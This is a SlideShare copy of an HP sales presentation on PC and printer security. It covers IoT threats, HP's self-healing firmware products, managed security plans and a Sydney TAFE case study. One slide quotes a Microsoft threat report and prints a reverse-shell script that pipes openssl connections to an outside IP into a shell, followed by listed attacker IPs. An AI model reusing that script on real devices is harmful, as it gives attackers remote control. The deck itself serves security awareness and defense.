SlideShare uma empresa Scribd logo
1 de 14
Baixar para ler offline
c04912106, May 2019, Rev. 141
Transform Endpoint
Security with the World’s
Most Secure PCs and
Printers
Jacky Cheung
Market Development Manager
Jan 13, 2020
Get the world’s most secure PCs and
Printers
PROXY &
FIREWALL
CONTROLS
(SITE
CATEGORIZATION,
SSL INSPECTION,
CONTENT ANALYSIS)
CLOUD
CONTROLS
(CASB,
CLOUD AV)
NETWORK
CONTROLS
(NETWORK AV,
SANDBOXING,
SECURITY
ANALYTICS)
HOST
CONTROLS
(ENDPOINT AV,
APPLICATION
WHITELISTING, EDR)
ON THE
ENDPOINT
ON THE
NETWORK
ENTERING
THE
NETWORK
OUTSIDE
THE
NETWORK
HP PCs and Printers
are engineered with
hardened security
features to protect and
recover from
cyberattacks before they
become headlines.
Where we Play
Last line of Defense
Firmware
and software
Email
Hardware
Internet
Network
access
• Print infrastructure is
now viewed as one
of the top security
risks by
organizations*
Today’s printers act a whole lot like PCs
c04912106, March 2019, Rev. 13
Perceived Level of Security Risk
Page 5: Printer Security : The New IT Imperative, Research Shows That the “Humble Printer”, Remains a Security Blind Spot4
MFP Security Vulnerabilities
Page 7, Global Print Security Landscape, 2019 , Quocirca5
Microsoft’s Threat Intelligence
Report – August 2019
c04912106, May 2019, Rev. 146
IoT Devices ( Printers, VOIP Phone,
DVRs) are being used as entry
points into the corporate networks
#!/bin/sh
export [IOT Device] ="-qws-display :1 -nomouse"
echo 1|tee /tmp/.c;sh-c '(until (sh-c "openssls_client-quiet -host
167.114.153.55 -port 443 |while : ; do sh&& break; done|
openssls_client-quiet -host 167.114.153.55 -port 443"); do
(sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee/tmp.c&&
if [ $cn-ge30 ]; then (rm /tmp/.c;pkill-f 'openssl'); fi);done)&' &
--end contents of file—
• 167.114.153.55, 94.237.37.28, 82.118.242.171,
31.220.61.251, 128.199.199.187
• https://msrc-
blog.microsoft.com/2019/08/05/corporate-iot-a-path-
to-intrusion
c04912106, May 2019, Rev. 147
 IT Asset Management
 Custom security policy
 Anti-Malware / OS Security
 Patching
 Hardening, Secure Configuration
 Network security (802.1x,
Internet Exposure etc)
 Reports (Audits, Compliance
reports)
 3rdParty contracts
Call to Action -Recommendations from
Microsoft and OEMs
1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services,
security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or
www.hp.com/go/mps.
 Monitors outbound network connections (packets)
 Detects anomalous network behavior
 Learns what’s normal, then inspects and stops
suspicious packets
 User-defined DNS whitelist
 Monitors DNS activity to detect attempts to contact
Command & Control server
 Triggers a reboot to initiate self-healing procedures
without IT intervention
 Creates security events that can be integrated with a
SIEM,
Anti-malware technology in HP Printers
/ MFDs
HP Printer / MFD Security Dashboard
9
HP SURE START1 HP SURE RUN2 HP SURE RECOVER3 HP SURE CLICK4 HP SURE VIEW5
The world’s first
SELF-HEALING BIOS
Others can detect, but
HP Sure Start can
RECOVER!
Built-in
HARDWARE-
ENFORCED
RUNTIME
PERSISTENCE
for your
PC's key security
processes
SECURE AND
AUTOMATED
RECOVERY
on the world’s first and
only PCs with a
firmware-embedded
self-healing system
image28
SECURE WEB
BROWSING
to protect against
most common
attack methods
and attachment
viewing
Protect against
INTEGRATED
PRIVACY
SCREEN6
UNIQUE HARDWARE - UNMATCHED
PROTECTION
HARDWARE-ENFORCED RESILIENCE AGAINST…
BIOS Rootkits
like
LoJax
Viruses that take down OS
defenses like
H1N1
Wiper attacks
like
NotPetya
Web-borne or Office
malware like
WannaCry
Shoulder surfing
and
Visual
Hacking
HP Proactive Security plans
11
DaaS Proactive Security features
√
Real-time malware threat protection:
• Email attachment protection
• Phishing link protection
• Download protection
• Corporate website whitelisting support
for IT
√
HP TechPulse reporting and analytics:
• Protection status and gaps by time
• Most impacted users and devices by
prevented threats
• Threats by type and source
(summary/details), and over time
Standard
Self-
Managed
Enhanced
HP-
Managed
√ √
HP-managed service:
• Analysis of threats by Service Experts⁴
• Detailed, malware kill chain analysis²⁷
• Enforcement of isolation protection on
endpoints
√
Purchasers of HP DaaS Proactive Security¹ in the U.S receive the Aon CyQu self-assessment and security score. $0 retainer and one-hour
consultation included with optional incident response services from Aon. HP onboarding service representatives will provide instructions.
1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services,
security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or
www.hp.com/go/mps.
Case Study
Sydney TAFE closes security gaps across 1,000 – strong print estate
Challenge
With printers/MFPs becoming increasingly connected to the
network, there are risks to students’ personal information
and confidential staff information being leaked
The Australian Department of Defense identified printers
and MFPs as a potential source of cybersecurity incidents
Solution
HP delivered a Print Security Advisory Service. A three-
day risk assessment
The workshop helps discover security blind spots and
inefficiencies across Sydney TAFE’s printing and imaging
fleet
The workshop educated key stakeholders on threats and
helping Sydney TAFE reach consensus on the goals of a
new printing security strategy
1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services,
security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or
www.hp.com/go/mps.
Key Take Away
c04912106, May 2019, Rev. 1414
Should you have any further
Questions, please feel free to
Contact :
Jacky Cheung
Market Development Manager
HP Inc Hong Kong Limited
TEL : 852 60740307
Email : jacky.cheung@hp.com
THANK YOU

Mais conteúdo relacionado

Mais procurados

Needs of a Modern Incident Response Program
Needs of a Modern Incident Response ProgramNeeds of a Modern Incident Response Program
Needs of a Modern Incident Response Program
Lancope, Inc.
 
Start With A Great Information Security Plan!
Start With A Great Information Security Plan!Start With A Great Information Security Plan!
Start With A Great Information Security Plan!
Tammy Clark
 
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex TrainingCybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Bryan Len
 
Module0&1 intro-foundations-b
Module0&1 intro-foundations-bModule0&1 intro-foundations-b
Module0&1 intro-foundations-b
BbAOC
 

Mais procurados (20)

Needs of a Modern Incident Response Program
Needs of a Modern Incident Response ProgramNeeds of a Modern Incident Response Program
Needs of a Modern Incident Response Program
 
Information security policy
Information security policyInformation security policy
Information security policy
 
Securing your presence at the perimeter
Securing your presence at the perimeterSecuring your presence at the perimeter
Securing your presence at the perimeter
 
5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses
 
Cyber Security 4.0 conference 30 November 2016
Cyber Security 4.0 conference 30 November 2016Cyber Security 4.0 conference 30 November 2016
Cyber Security 4.0 conference 30 November 2016
 
Start With A Great Information Security Plan!
Start With A Great Information Security Plan!Start With A Great Information Security Plan!
Start With A Great Information Security Plan!
 
PACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless AttacksPACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless Attacks
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
 
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex TrainingCybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex Training
 
Security tools
Security toolsSecurity tools
Security tools
 
IT & Network Security Awareness
IT & Network Security AwarenessIT & Network Security Awareness
IT & Network Security Awareness
 
IT Security and Risk Mitigation
IT Security and Risk MitigationIT Security and Risk Mitigation
IT Security and Risk Mitigation
 
Cybersecurity Insiders Webinar - Zero Trust: Best Practices for Securing the...
Cybersecurity Insiders Webinar  - Zero Trust: Best Practices for Securing the...Cybersecurity Insiders Webinar  - Zero Trust: Best Practices for Securing the...
Cybersecurity Insiders Webinar - Zero Trust: Best Practices for Securing the...
 
Third party datasecurity assurance questionnaire
Third party datasecurity assurance questionnaireThird party datasecurity assurance questionnaire
Third party datasecurity assurance questionnaire
 
Info Sec2007 End Point Final
Info Sec2007   End Point FinalInfo Sec2007   End Point Final
Info Sec2007 End Point Final
 
Topic11
Topic11Topic11
Topic11
 
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
 
SEC440: Incident Response Plan
SEC440: Incident Response PlanSEC440: Incident Response Plan
SEC440: Incident Response Plan
 
Rothke rsa 2013 - the five habits of highly secure organizations
Rothke   rsa 2013 - the five habits of highly secure organizationsRothke   rsa 2013 - the five habits of highly secure organizations
Rothke rsa 2013 - the five habits of highly secure organizations
 
Module0&1 intro-foundations-b
Module0&1 intro-foundations-bModule0&1 intro-foundations-b
Module0&1 intro-foundations-b
 

Semelhante a 08 Transform Endpoint Security with the World’s Most Secure PCs and Printers

Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
cuddietheresa
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
salmonpybus
 
Security Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA EnvironmentsSecurity Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA Environments
amiable_indian
 
amrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdfamrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdf
amrapalibuildersreviews
 
Beyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus securityBeyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus security
UltraUploader
 
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docxMeltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
roushhsiu
 

Semelhante a 08 Transform Endpoint Security with the World’s Most Secure PCs and Printers (20)

Think Your Network Is Safe? Check Your Printers
Think Your Network Is Safe? Check Your PrintersThink Your Network Is Safe? Check Your Printers
Think Your Network Is Safe? Check Your Printers
 
Retail
RetailRetail
Retail
 
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
 
Security Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA EnvironmentsSecurity Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA Environments
 
MBM Security Products Matrix
MBM Security Products MatrixMBM Security Products Matrix
MBM Security Products Matrix
 
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
 
amrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdfamrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdf
 
HMI/SCADA 리스크 감소
HMI/SCADA 리스크 감소HMI/SCADA 리스크 감소
HMI/SCADA 리스크 감소
 
Vulnerability Management
Vulnerability ManagementVulnerability Management
Vulnerability Management
 
Security assessment with a hint of CISSP Prep
Security assessment with a hint of CISSP PrepSecurity assessment with a hint of CISSP Prep
Security assessment with a hint of CISSP Prep
 
The Insider Threats - Are You at Risk?
The Insider Threats - Are You at Risk?The Insider Threats - Are You at Risk?
The Insider Threats - Are You at Risk?
 
Ransomware Prevention Guide
Ransomware Prevention GuideRansomware Prevention Guide
Ransomware Prevention Guide
 
Beyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus securityBeyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus security
 
Drivelock modern approach of it security & amp; encryption solution -whitep...
Drivelock   modern approach of it security & amp; encryption solution -whitep...Drivelock   modern approach of it security & amp; encryption solution -whitep...
Drivelock modern approach of it security & amp; encryption solution -whitep...
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability Scanner
 
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docxMeltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
 
Cyberattacks on the Rise: Is Your Nonprofit Prepared?
Cyberattacks on the Rise: Is Your Nonprofit Prepared?Cyberattacks on the Rise: Is Your Nonprofit Prepared?
Cyberattacks on the Rise: Is Your Nonprofit Prepared?
 
Business Continuity 2009
Business Continuity 2009Business Continuity 2009
Business Continuity 2009
 

Mais de eLearning Consortium 電子學習聯盟

Mais de eLearning Consortium 電子學習聯盟 (20)

AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
 
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
 
2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf
2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf
2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf
 
1. How Data Analytics Transforming Digital Marketing - Saron Leung
1. How Data Analytics Transforming Digital Marketing - Saron Leung1. How Data Analytics Transforming Digital Marketing - Saron Leung
1. How Data Analytics Transforming Digital Marketing - Saron Leung
 
HKTVMall: Leading Technology Evolution for eCommerce Industry
HKTVMall: Leading Technology Evolution for eCommerce IndustryHKTVMall: Leading Technology Evolution for eCommerce Industry
HKTVMall: Leading Technology Evolution for eCommerce Industry
 
How Blockchain affecting us - Dr Sin.pdf
How Blockchain affecting us - Dr Sin.pdfHow Blockchain affecting us - Dr Sin.pdf
How Blockchain affecting us - Dr Sin.pdf
 
5-Hot-Chain Bento.pdf
5-Hot-Chain Bento.pdf5-Hot-Chain Bento.pdf
5-Hot-Chain Bento.pdf
 
4-Herbal ID.pdf
4-Herbal ID.pdf4-Herbal ID.pdf
4-Herbal ID.pdf
 
3-VisualSonic.pdf
3-VisualSonic.pdf3-VisualSonic.pdf
3-VisualSonic.pdf
 
2-kNOw Touch.pdf
2-kNOw Touch.pdf2-kNOw Touch.pdf
2-kNOw Touch.pdf
 
1-C-POLAR Air Filter.pdf
1-C-POLAR Air Filter.pdf1-C-POLAR Air Filter.pdf
1-C-POLAR Air Filter.pdf
 
3 - Interaction between Cyber Security and School IT Policy .pdf
3 - Interaction between Cyber Security and School IT Policy .pdf3 - Interaction between Cyber Security and School IT Policy .pdf
3 - Interaction between Cyber Security and School IT Policy .pdf
 
2 - ELC學校網絡安全與防護.pdf
2 - ELC學校網絡安全與防護.pdf2 - ELC學校網絡安全與防護.pdf
2 - ELC學校網絡安全與防護.pdf
 
1 - HKT Reporting.pdf
1 - HKT Reporting.pdf1 - HKT Reporting.pdf
1 - HKT Reporting.pdf
 
07 2020 網絡安全趨勢和安全小貼士
07 2020 網絡安全趨勢和安全小貼士07 2020 網絡安全趨勢和安全小貼士
07 2020 網絡安全趨勢和安全小貼士
 
06 網絡安全挑戰與防衛
06 網絡安全挑戰與防衛06 網絡安全挑戰與防衛
06 網絡安全挑戰與防衛
 
04 提升網絡安全 - 為電子學習打造先決條件
04 提升網絡安全 - 為電子學習打造先決條件04 提升網絡安全 - 為電子學習打造先決條件
04 提升網絡安全 - 為電子學習打造先決條件
 
03 學校網絡安全與防衛
03 學校網絡安全與防衛03 學校網絡安全與防衛
03 學校網絡安全與防衛
 
Experience Sharing on School Pentest Project (Updated)
Experience Sharing on School Pentest Project (Updated)Experience Sharing on School Pentest Project (Updated)
Experience Sharing on School Pentest Project (Updated)
 
Security Incident Handling for Schools
Security Incident Handling for Schools Security Incident Handling for Schools
Security Incident Handling for Schools
 

Último

Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
PECB
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
QucHHunhnh
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
QucHHunhnh
 

Último (20)

Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibit
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual  Proper...General Principles of Intellectual Property: Concepts of Intellectual  Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Asian American Pacific Islander Month DDSD 2024.pptx
Asian American Pacific Islander Month DDSD 2024.pptxAsian American Pacific Islander Month DDSD 2024.pptx
Asian American Pacific Islander Month DDSD 2024.pptx
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
PROCESS RECORDING FORMAT.docx
PROCESS      RECORDING        FORMAT.docxPROCESS      RECORDING        FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701
 

08 Transform Endpoint Security with the World’s Most Secure PCs and Printers

  • 1. c04912106, May 2019, Rev. 141 Transform Endpoint Security with the World’s Most Secure PCs and Printers Jacky Cheung Market Development Manager Jan 13, 2020
  • 2. Get the world’s most secure PCs and Printers PROXY & FIREWALL CONTROLS (SITE CATEGORIZATION, SSL INSPECTION, CONTENT ANALYSIS) CLOUD CONTROLS (CASB, CLOUD AV) NETWORK CONTROLS (NETWORK AV, SANDBOXING, SECURITY ANALYTICS) HOST CONTROLS (ENDPOINT AV, APPLICATION WHITELISTING, EDR) ON THE ENDPOINT ON THE NETWORK ENTERING THE NETWORK OUTSIDE THE NETWORK HP PCs and Printers are engineered with hardened security features to protect and recover from cyberattacks before they become headlines. Where we Play Last line of Defense
  • 3. Firmware and software Email Hardware Internet Network access • Print infrastructure is now viewed as one of the top security risks by organizations* Today’s printers act a whole lot like PCs c04912106, March 2019, Rev. 13
  • 4. Perceived Level of Security Risk Page 5: Printer Security : The New IT Imperative, Research Shows That the “Humble Printer”, Remains a Security Blind Spot4
  • 5. MFP Security Vulnerabilities Page 7, Global Print Security Landscape, 2019 , Quocirca5
  • 6. Microsoft’s Threat Intelligence Report – August 2019 c04912106, May 2019, Rev. 146 IoT Devices ( Printers, VOIP Phone, DVRs) are being used as entry points into the corporate networks #!/bin/sh export [IOT Device] ="-qws-display :1 -nomouse" echo 1|tee /tmp/.c;sh-c '(until (sh-c "openssls_client-quiet -host 167.114.153.55 -port 443 |while : ; do sh&& break; done| openssls_client-quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee/tmp.c&& if [ $cn-ge30 ]; then (rm /tmp/.c;pkill-f 'openssl'); fi);done)&' & --end contents of file— • 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251, 128.199.199.187 • https://msrc- blog.microsoft.com/2019/08/05/corporate-iot-a-path- to-intrusion
  • 7. c04912106, May 2019, Rev. 147  IT Asset Management  Custom security policy  Anti-Malware / OS Security  Patching  Hardening, Secure Configuration  Network security (802.1x, Internet Exposure etc)  Reports (Audits, Compliance reports)  3rdParty contracts Call to Action -Recommendations from Microsoft and OEMs
  • 8. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps.  Monitors outbound network connections (packets)  Detects anomalous network behavior  Learns what’s normal, then inspects and stops suspicious packets  User-defined DNS whitelist  Monitors DNS activity to detect attempts to contact Command & Control server  Triggers a reboot to initiate self-healing procedures without IT intervention  Creates security events that can be integrated with a SIEM, Anti-malware technology in HP Printers / MFDs
  • 9. HP Printer / MFD Security Dashboard 9
  • 10. HP SURE START1 HP SURE RUN2 HP SURE RECOVER3 HP SURE CLICK4 HP SURE VIEW5 The world’s first SELF-HEALING BIOS Others can detect, but HP Sure Start can RECOVER! Built-in HARDWARE- ENFORCED RUNTIME PERSISTENCE for your PC's key security processes SECURE AND AUTOMATED RECOVERY on the world’s first and only PCs with a firmware-embedded self-healing system image28 SECURE WEB BROWSING to protect against most common attack methods and attachment viewing Protect against INTEGRATED PRIVACY SCREEN6 UNIQUE HARDWARE - UNMATCHED PROTECTION HARDWARE-ENFORCED RESILIENCE AGAINST… BIOS Rootkits like LoJax Viruses that take down OS defenses like H1N1 Wiper attacks like NotPetya Web-borne or Office malware like WannaCry Shoulder surfing and Visual Hacking
  • 11. HP Proactive Security plans 11 DaaS Proactive Security features √ Real-time malware threat protection: • Email attachment protection • Phishing link protection • Download protection • Corporate website whitelisting support for IT √ HP TechPulse reporting and analytics: • Protection status and gaps by time • Most impacted users and devices by prevented threats • Threats by type and source (summary/details), and over time Standard Self- Managed Enhanced HP- Managed √ √ HP-managed service: • Analysis of threats by Service Experts⁴ • Detailed, malware kill chain analysis²⁷ • Enforcement of isolation protection on endpoints √ Purchasers of HP DaaS Proactive Security¹ in the U.S receive the Aon CyQu self-assessment and security score. $0 retainer and one-hour consultation included with optional incident response services from Aon. HP onboarding service representatives will provide instructions.
  • 12. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Case Study Sydney TAFE closes security gaps across 1,000 – strong print estate Challenge With printers/MFPs becoming increasingly connected to the network, there are risks to students’ personal information and confidential staff information being leaked The Australian Department of Defense identified printers and MFPs as a potential source of cybersecurity incidents Solution HP delivered a Print Security Advisory Service. A three- day risk assessment The workshop helps discover security blind spots and inefficiencies across Sydney TAFE’s printing and imaging fleet The workshop educated key stakeholders on threats and helping Sydney TAFE reach consensus on the goals of a new printing security strategy
  • 13. 1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services, security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or www.hp.com/go/mps. Key Take Away
  • 14. c04912106, May 2019, Rev. 1414 Should you have any further Questions, please feel free to Contact : Jacky Cheung Market Development Manager HP Inc Hong Kong Limited TEL : 852 60740307 Email : jacky.cheung@hp.com THANK YOU